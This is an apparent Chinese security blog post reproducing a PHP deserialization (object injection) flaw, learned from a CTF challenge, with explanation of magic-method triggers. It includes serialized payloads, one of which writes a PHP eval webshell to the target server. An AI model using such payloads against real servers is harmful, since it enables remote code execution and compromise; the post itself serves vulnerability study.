<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>PHP反序列化漏洞复现 | BlBana&#39;s Blog 一只Web汪 ~</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="导语之前做华山杯的一道题里，在读取一个文件内容的时候，由于无法直接读取，看writeup里采用改了php反序列化的方式去读取了对应的文件，当时看有点懵逼，就去补了补PHP反序列化漏洞的原理和利用。">
<meta name="keywords" content="Webshell,代码执行,漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP反序列化漏洞复现">
<meta property="og:url" content="http://blbana.cc/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/index.html">
<meta property="og:site_name" content="BlBana&#39;s Blog 一只Web汪 ~">
<meta property="og:description" content="导语之前做华山杯的一道题里，在读取一个文件内容的时候，由于无法直接读取，看writeup里采用改了php反序列化的方式去读取了对应的文件，当时看有点懵逼，就去补了补PHP反序列化漏洞的原理和利用。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/00be3624e76e59c180034a9b97d6bc21.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/b45134209b152bb6b391675af4f0d156.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/6b7d6e308f929c8475228629bbaaac84.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/f92c2a37b60c3e1f6ddea06a651d126d.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/5603752e0c398cd84d258cb7d40d42dd.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/e26f3d61a7b5fb173797e0dd53a95417.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/4ae2cf91bd4b5c53eeef6d3a6d242888.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/aa2090e05aa0c0067950b7d0acf375dd.png">
<meta property="og:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/2747968806edf2c8fcc7e32d09b68783.png">
<meta property="og:updated_time" content="2018-10-24T11:57:44.974Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="PHP反序列化漏洞复现">
<meta name="twitter:description" content="导语之前做华山杯的一道题里，在读取一个文件内容的时候，由于无法直接读取，看writeup里采用改了php反序列化的方式去读取了对应的文件，当时看有点懵逼，就去补了补PHP反序列化漏洞的原理和利用。">
<meta name="twitter:image" content="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/00be3624e76e59c180034a9b97d6bc21.png">
  
    <link rel="alternative" href="/atom.xml" title="BlBana&#39;s Blog 一只Web汪 ~" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.png">
  
  
      <link rel="stylesheet" href="//cdn.bootcss.com/animate.css/3.5.0/animate.min.css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/font-awesome/css/font-awesome.min.css">
  <link rel="apple-touch-icon" href="/apple-touch-icon.png">
  
  
      <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  
  <!-- 加载特效 -->
    <script src="/js/pace.js"></script>
    <link href="/css/pace/pace-theme-flash.css" rel="stylesheet">
  <script>
      var yiliaConfig = {
          rootUrl: '/',
          fancybox: true,
          animate: true,
          isHome: false,
          isPost: true,
          isArchive: false,
          isTag: false,
          isCategory: false,
          open_in_new: false
      }
  </script>
</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            
            <img lazy-src="/img/head.jpg" class="js-avatar">
            
        </a>

        <hgroup>
          <h1 class="header-author"><a href="/" title="Hi Mate">BlBana</a></h1>
        </hgroup>

        
        <p class="header-subtitle">A interesting Web Dog~</p>
        
        
        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/index.html">首页</a></li>
                        
                            <li><a href="/archives">所有文章</a></li>
                        
                            <li><a href="/tags">标签页</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fl mail" target="_blank" href="https://mail.qq.com/cgi-bin/frame_html?sid=1iXYOD0d3gFFCC11&r=8a78462be569bc94330c32990aaf4f0e" title="mail">mail</a>
                            
                                <a class="fl github" target="_blank" href="https://github.com/BlBana" title="github">github</a>
                            
                                <a class="fl zhihu" target="_blank" href="https://www.zhihu.com/people/zhu-rong-ji-15/activities" title="zhihu">zhihu</a>
                            
                                <a class="fl weibo" target="_blank" href="#" title="weibo">weibo</a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <a href="/tags/CTF/" style="font-size: 12.5px;">CTF</a> <a href="/tags/PHP/" style="font-size: 17.5px;">PHP</a> <a href="/tags/PHP函数漏洞/" style="font-size: 10px;">PHP函数漏洞</a> <a href="/tags/SQL注入/" style="font-size: 15px;">SQL注入</a> <a href="/tags/SQL注入绕过/" style="font-size: 10px;">SQL注入绕过</a> <a href="/tags/Struts2/" style="font-size: 10px;">Struts2</a> <a href="/tags/Tomcat/" style="font-size: 10px;">Tomcat</a> <a href="/tags/WP/" style="font-size: 10px;">WP</a> <a href="/tags/Webshell/" style="font-size: 20px;">Webshell</a> <a href="/tags/Web安全/" style="font-size: 15px;">Web安全</a> <a href="/tags/Windows安全配置/" style="font-size: 15px;">Windows安全配置</a> <a href="/tags/blogs/" style="font-size: 10px;">blogs</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/waf绕过/" style="font-size: 10px;">waf绕过</a> <a href="/tags/上传漏洞/" style="font-size: 15px;">上传漏洞</a> <a href="/tags/上传绕过方法/" style="font-size: 10px;">上传绕过方法</a> <a href="/tags/代码执行/" style="font-size: 10px;">代码执行</a> <a href="/tags/修改密码/" style="font-size: 10px;">修改密码</a> <a href="/tags/命令执行漏洞/" style="font-size: 10px;">命令执行漏洞</a> <a href="/tags/安全编码/" style="font-size: 10px;">安全编码</a> <a href="/tags/安全配置/" style="font-size: 10px;">安全配置</a> <a href="/tags/宽字节注入/" style="font-size: 10px;">宽字节注入</a> <a href="/tags/提权/" style="font-size: 10px;">提权</a> <a href="/tags/文件包含/" style="font-size: 12.5px;">文件包含</a> <a href="/tags/服务器/" style="font-size: 15px;">服务器</a> <a href="/tags/服务器配置/" style="font-size: 20px;">服务器配置</a> <a href="/tags/沙盒/" style="font-size: 10px;">沙盒</a> <a href="/tags/漏洞复现/" style="font-size: 10px;">漏洞复现</a> <a href="/tags/绕过过滤/" style="font-size: 10px;">绕过过滤</a> <a href="/tags/转载/" style="font-size: 10px;">转载</a> <a href="/tags/运维/" style="font-size: 17.5px;">运维</a> <a href="/tags/邮件系统/" style="font-size: 10px;">邮件系统</a> <a href="/tags/随笔/" style="font-size: 10px;">随笔</a>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a target="_blank" class="main-nav-link switch-friends-link" href="http://blog.0wen.cc">0wen</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">Web dog，会PHP，Python，代码审计，来有木有一起屁股的~</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="Me">BlBana</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                
                    <img lazy-src="/img/head.jpg" class="js-avatar">
                
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="Me">BlBana</a></h1>
            </hgroup>
            
            <p class="header-subtitle">A interesting Web Dog~</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/index.html">首页</a></li>
                
                    <li><a href="/archives">所有文章</a></li>
                
                    <li><a href="/tags">标签页</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                <div class="social">
                    
                        <a class="mail" target="_blank" href="https://mail.qq.com/cgi-bin/frame_html?sid=1iXYOD0d3gFFCC11&r=8a78462be569bc94330c32990aaf4f0e" title="mail">mail</a>
                    
                        <a class="github" target="_blank" href="https://github.com/BlBana" title="github">github</a>
                    
                        <a class="zhihu" target="_blank" href="https://www.zhihu.com/people/zhu-rong-ji-15/activities" title="zhihu">zhihu</a>
                    
                        <a class="weibo" target="_blank" href="#" title="weibo">weibo</a>
                    
                </div>
            </nav>
        </header>                
    </div>
</nav>
      <div class="body-wrap"><article id="post-php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0" class="article article-type-post" itemscope="" itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/" class="article-date">
      <time datetime="2016-09-16T08:12:33.000Z" itemprop="datePublished">2016-09-16</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      PHP反序列化漏洞复现
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        
    <div class="article-category tagcloud">
    <a class="article-category-link" href="/categories/漏洞复现/">漏洞复现</a>
    </div>


        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Webshell/">Webshell</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/代码执行/">代码执行</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/漏洞复现/">漏洞复现</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="导语"><a href="#导语" class="headerlink" title="导语"></a>导语</h2><p>之前做华山杯的一道题里，在读取一个文件内容的时候，由于无法直接读取，看writeup里采用改了php反序列化的方式去读取了对应的文件，当时看有点懵逼，就去补了补PHP反序列化漏洞的原理和利用。<br><a id="more"></a></p>
<h2 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h2><h3 id="漏洞代码："><a href="#漏洞代码：" class="headerlink" title="漏洞代码："></a>漏洞代码：</h3><p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/00be3624e76e59c180034a9b97d6bc21.png" alt=""></p>
<h3 id="漏洞利用条件："><a href="#漏洞利用条件：" class="headerlink" title="漏洞利用条件："></a>漏洞利用条件：</h3><p>1.程序中必须有一个PHP的魔术方法，比如_wakeup或者_destruct，我们需要利用这个方法，来进行攻击；</p>
<p>2.程序中含有PHP反序列化的函数unserialize()</p>
<p>3.exp需要能够保存在服务器中，如果目标服务器开启了allow_url_fopen，我们可以利用file_get_contents函数远程读取文件。</p>
<p>此时我们的代码中已经具备了以上的条件，可以进行PHP的对象注入了。</p>
<h3 id="exp内容："><a href="#exp内容：" class="headerlink" title="exp内容："></a>exp内容：</h3><p>O:3:”foo”:2:{s:4:”file”;s:9:”shell.php”;s:4:”data”;s:4:”aaaa”;}</p>
<p>我们成功执行exp时，会在同一个目录下生成一个名叫shell.php的文件，并且文件内容为aaaa.</p>
<h3 id="漏洞利用："><a href="#漏洞利用：" class="headerlink" title="漏洞利用："></a>漏洞利用：</h3><p>我们先通过上传之类的方法，将这个exp.txt上传到服务器当中，通过代码我们可以看出来，最后程序会将文件中的内容通过file_get_contents()函数读取出来，在程序执行完毕的时候，由于_destruct方法触发了代码执行。</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/b45134209b152bb6b391675af4f0d156.png" alt=""></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/6b7d6e308f929c8475228629bbaaac84.png" alt=""></p>
<p>在同级目录下生成了一个shell.php，且内容为aaaa</p>
<h3 id="漏洞分析："><a href="#漏洞分析：" class="headerlink" title="漏洞分析："></a>漏洞分析：</h3><p>出现这个漏洞的时候我们可以利用它向目标服务器上写入shell：</p>
<p>O:3:”foo”:2:{s:4:”file”;s:9:”shell.php”;s:4:”data”;s:4:”&lt;?php @eval($_GET[‘BlBana’])?&gt;”;}</p>
<p>通过这个exp，我们在shell.php写入的便是一句话。</p>
<p>需要注意的是，在字符串中，前面的数字代表的是后面字符串中字符的个数，如果数字与字符个数不匹配的话，就会报错，并向shell.php中写入初始内容“text”，我在不同版本的PHP中测试了这种错误。</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/f92c2a37b60c3e1f6ddea06a651d126d.png" alt=""></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/5603752e0c398cd84d258cb7d40d42dd.png" alt=""></p>
<p>在以上这两个版本中测试的时候，若我们序列化后的字符串不符合要求，就会抛出一个错误，并向shell.php中写入初始值。</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/e26f3d61a7b5fb173797e0dd53a95417.png" alt=""></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/4ae2cf91bd4b5c53eeef6d3a6d242888.png" alt=""></p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/aa2090e05aa0c0067950b7d0acf375dd.png" alt=""></p>
<p>但是在这个版本的PHP中，不会报错，但是依然是在shell.php中写入初始值。所以在利用的时候需要注意以上的内容。</p>
<hr>
<p>现在分析一下漏洞的一些细节，这是因为我们通过GET传递了参数给session_filename这个参数中，导致之后的函数file_get_contents读取了exp.txt中的字符串，之后字符串被反序列化为了foo的数组对象，导致了代码执行。</p>
<p><img src="http://blog-img-1252112827.cos.ap-chengdu.myqcloud.com/2016/09/2747968806edf2c8fcc7e32d09b68783.png" alt=""></p>
<p>被反序列后产生的数组对象，相当于我们利用new foo（）生成了一个对象，但是，对象中的内容是以数组的形式存放的。</p>
<p>foo Object ( [file] =&gt; 2.txt [data] =&gt; text )</p>
<p>这是一个正常的数组对象，我们反序列后的字符串是</p>
<p>foo Object ( [file] =&gt; shell.php [data] =&gt; aaaa )</p>
<p>使得我们传入的恶意内容覆盖了原先数组初始值</p>
<p>O:3:”foo”:2:{s:4:”file”;s:9:”shell.php”;s:4:”data”;s:4:”aaaa”;}<br>O:3:”foo”:2:{s:4:”file”;s:5:”2.txt”;s:4:”data”;s:4:”text”;}</p>
<p>具体的序列化后的字符串如上所示。</p>
<p>我们成功的修改了变量$file和$data的值，这时候我们需要的是执行魔术方法_destruct()，这个方法的执行有以下集中方法：</p>
<p>1.当程序正常的执行完毕后，所有的对象被销毁了，析构函数被调用（<span style="color: #ff0000;">我们这里就是这种方法</span>）</p>
<p><span style="color: #000000;">2.当对象没有指向时，对象被销毁</span></p>
<p>$p = new foo();</p>
<p>$p = null;</p>
<p>此时析构函数执行</p>
<p>3.使用unset变量销毁指向对象的变量，<span style="color: #ff0000;">注意的是unset销毁的是指向对象的变量，而不是对象，只有指向同一个对象的所有变量都销毁的时候，析构函数才执行。</span></p>
<p>也就是说当对象被销毁时，析构函数就会被调用。</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>PHP的反序列化漏洞，可以导致远程代码的执行，漏洞产生后的后果也是十分严重的，因此在使用unserialize函数的时候应当注意漏洞形成所具备的条件，避免漏洞的产生。</p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/">PHP反序列化漏洞复现</a></p>
        <p><span>文章作者:</span><a href="/" title="访问 BlBana 的个人博客">BlBana</a></p>
        <p><span>发布时间:</span>2016年09月16日 - 16时12分</p>
        <p><span>最后更新:</span>2018年10月24日 - 19时57分</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/" title="PHP反序列化漏洞复现">http://blbana.cc/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/</a>
            <span class="copy-path" data-clipboard-text="原文: http://blbana.cc/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/　　作者: BlBana" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script src="/js/clipboard.min.js"></script>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/3.0/cn/" title="中国大陆 (CC BY-NC-SA 3.0 CN)" target="_blank">"署名-非商用-相同方式共享 3.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



<nav id="article-nav">
  
    <a href="/2016/09/19/waf-e7-bb-95-e8-bf-87-e6-80-bb-e7-bb-93-ef-bc-88-e8-bd-ac-e8-bd-bd-ef-bc-89/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption"><</strong>
      <div class="article-nav-title">
        
          waf绕过总结（转载）
        
      </div>
    </a>
  
  
    <a href="/2016/09/05/e7-99-be-e5-ba-a6-e6-9d-afctf-upload-writeup/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">百度杯CTF--第一周 writeup</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>

    <div id="toc" class="toc-article">
    <strong class="toc-title">文章目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#导语"><span class="toc-number">1.</span> <span class="toc-text">导语</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#正文"><span class="toc-number">2.</span> <span class="toc-text">正文</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞代码："><span class="toc-number">2.1.</span> <span class="toc-text">漏洞代码：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞利用条件："><span class="toc-number">2.2.</span> <span class="toc-text">漏洞利用条件：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#exp内容："><span class="toc-number">2.3.</span> <span class="toc-text">exp内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞利用："><span class="toc-number">2.4.</span> <span class="toc-text">漏洞利用：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#漏洞分析："><span class="toc-number">2.5.</span> <span class="toc-text">漏洞分析：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#总结"><span class="toc-number">3.</span> <span class="toc-text">总结</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
      <div class="duoshuo" id="comments">
    <!-- 多说评论框 start -->
    <div class="ds-thread" data-thread-key="2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/" data-title="PHP反序列化漏洞复现" data-url="http://blbana.cc/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/"></div>
    <!-- 多说评论框 end -->
    <!-- 多说公共JS代码 start (一个网页只需插入一次) -->
    <script type="text/javascript">
    var duoshuoQuery = {short_name:"blbana"};
    (function() {
        var ds = document.createElement('script');
        ds.type = 'text/javascript';ds.async = true;
        ds.src = '/js/embed.js';
        ds.charset = 'UTF-8';
        (document.getElementsByTagName('head')[0] 
         || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
    </script>
    <!-- 多说公共JS代码 end -->
</div>

    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2016/09/19/waf-e7-bb-95-e8-bf-87-e6-80-bb-e7-bb-93-ef-bc-88-e8-bd-ac-e8-bd-bd-ef-bc-89/" title="上一篇: waf绕过总结（转载）">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2016/09/05/e7-99-be-e5-ba-a6-e6-9d-afctf-upload-writeup/" title="下一篇: 百度杯CTF--第一周 writeup">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2018/09/14/20180914-回归博客/">emmm...诈尸Test</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/05/20/SQLi-——-逗号，空格，字段名过滤突破/">SQLi —— 逗号，空格，字段名过滤突破</a></li><li class="post-list-item"><a class="post-list-link" href="/2017/03/08/Struts2远程命令执行漏洞/">Struts2远程命令执行漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/19/PHP-s-mail-远程代码执行/">PHP's mail()远程代码执行</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/15/Pwnhub外传第一关总结/">Pwnhub外传第一关总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/14/论如何修改Win10密码/">论如何修改Win10密码</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/05/Mysql宽字节注入/">Mysql宽字节注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/05/Wordpress迁移hexo踩坑指南/">Wordpress迁移hexo踩坑指南</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/12/03/e6-96-87-e4-bb-b6-e5-8c-85-e5-90-ab-e6-bc-8f-e6-b4-9e-ef-bc-88-e4-ba-8c-ef-bc-89/">文件包含漏洞（二）</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/24/e9-80-9a-e8-bf-87tomcat-e8-8e-b7-e5-8f-96webshell/">通过Tomcat获取Webshell</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/16/mysql-e6-8a-a5-e9-94-99-e6-b3-a8-e5-85-a5-e5-8e-9f-e7-90-86/">Mysql报错注入原理</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/10/08/初玩docker总结/">初玩docker总结</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/19/waf-e7-bb-95-e8-bf-87-e6-80-bb-e7-bb-93-ef-bc-88-e8-bd-ac-e8-bd-bd-ef-bc-89/">waf绕过总结（转载）</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/16/php-e5-8f-8d-e5-ba-8f-e5-88-97-e5-8c-96-e6-bc-8f-e6-b4-9e-e5-a4-8d-e7-8e-b0/">PHP反序列化漏洞复现</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/09/05/e7-99-be-e5-ba-a6-e6-9d-afctf-upload-writeup/">百度杯CTF--第一周 writeup</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/12/e6-96-87-e4-bb-b6-e5-8c-85-e5-90-ab-e6-bc-8f-e6-b4-9e/">文件包含漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/08/e5-9d-91-e7-88-b9-e7-9a-84ftp-e6-9c-8d-e5-8a-a1-e5-99-a8-ef-bc-81-ef-bc-81-ef-bc-81/">坑爹的FTP服务器 ！！！</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/08/03/iisphpmysql-e7-8e-af-e5-a2-83-e6-90-ad-e5-bb-ba/">IIS+PHP+MySql环境搭建</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/30/php-ini-e5-ae-89-e5-85-a8-e9-85-8d-e7-bd-ae/">PHP.ini安全配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/30/apache-e6-9c-8d-e5-8a-a1-e5-99-a8-e5-a4-9a-e7-ab-99-e7-82-b9-e9-85-8d-e7-bd-ae/">Apache服务器多站点配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/30/windows-e6-9c-8d-e5-8a-a1-e5-99-a8-e5-9f-ba-e6-9c-ac-e6-a6-82-e5-bf-b5/">Windows服务器基本概念</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/30/158/">文件上传漏洞（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/28/e8-ae-b0-e4-b8-80-e6-ac-a1-e6-9b-b2-e6-8a-98-e7-9a-84-e6-b3-a8-e5-85-a5/">记一次曲折的注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/28/webshell-e6-8f-90-e6-9d-83-ef-bc-88-e4-b8-80-ef-bc-89/">Webshell提权（一）</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/28/webshell-ef-bc-88-e4-b8-80-ef-bc-89-e9-80-9a-e8-bf-87phmyadmin-e5-af-bc-e5-87-ba-e4-b8-80-e5-8f-a5-e8-af-9d/">Webshell（一）通过phmyadmin导出一句话</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/28/ubuntu-e4-b8-8bftp-e6-9c-8d-e5-8a-a1-e5-99-a8-e7-9a-84-e9-85-8d-e7-bd-ae/">Ubuntu下FTP服务器的配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2016/07/28/sql-e6-b3-a8-e5-85-a5-e5-85-a5-e9-97-a8-e4-b9-8baccess-e6-b3-a8-e5-85-a5/">SQL注入入门之ACCESS注入</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2018 BlBana
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">海贼到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
